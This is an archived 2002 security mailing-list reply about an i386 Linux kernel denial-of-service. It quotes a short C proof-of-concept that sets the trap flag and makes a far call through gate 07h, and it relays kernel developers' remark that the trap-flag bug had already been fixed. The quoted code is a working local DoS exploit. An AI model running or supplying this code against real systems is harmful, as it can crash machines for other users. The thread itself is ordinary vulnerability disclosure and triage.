RE: i386 Linux kernel DoS

From: Leif Sawyer (lsawyerat_private)
Date: Tue Nov 12 2002 - 15:58:36 PST

Next message: Christophe Devine: "Re: i386 Linux kernel DoS"

Previous message: Stephen Gill: "RE: Exploit code for IP Smart Spoofing"
Maybe in reply to: Christophe Devine: "i386 Linux kernel DoS"
Next in thread: Christophe Devine: "Re: i386 Linux kernel DoS"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Christophe Devine writes:
> /* USE AT YOUR OWN RISK ! */
> 
> int main( void )
> {
>     char dos[] = "\x9C"                           /* pushfd       */
>                  "\x58"                           /* pop eax      */
>                  "\x0D\x00\x01\x00\x00"           /* or eax,100h  */
>                  "\x50"                           /* push eax     */
>                  "\x9D"                           /* popfd        */
>                  "\x9A\x00\x00\x00\x00\x07\x00";  /* call 07h:00h */
> 
>     void (* f)( void );
> 
>     f = (void *) dos; (* f)();
> 
>     return 1;
> }

You didn't specify which kernel this was being used against, but
this is what the response from LKML is:

> -----Original Message-----
> From: Alan Cox
> Sent: Tuesday, November 12, 2002 3:10 PM
> To: Christoph Hellwig
> Cc: Leif Sawyer; Linux Kernel Mailing List
> Subject: Re: FW: i386 Linux kernel DoS
> 
> 
> On Tue, 2002-11-12 at 23:31, Christoph Hellwig wrote:
> > On Tue, Nov 12, 2002 at 02:28:55PM -0900, Leif Sawyer wrote:
> > > This was posted on bugtraq today...
> > 
> > A real segfaulting program?  wow :)
> 
> Looks like the TF handling bug which was fixed a while ago

Next message: Christophe Devine: "Re: i386 Linux kernel DoS"
Previous message: Stephen Gill: "RE: Exploit code for IP Smart Spoofing"
Maybe in reply to: Christophe Devine: "i386 Linux kernel DoS"
Next in thread: Christophe Devine: "Re: i386 Linux kernel DoS"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Nov 15 2002 - 14:12:17 PST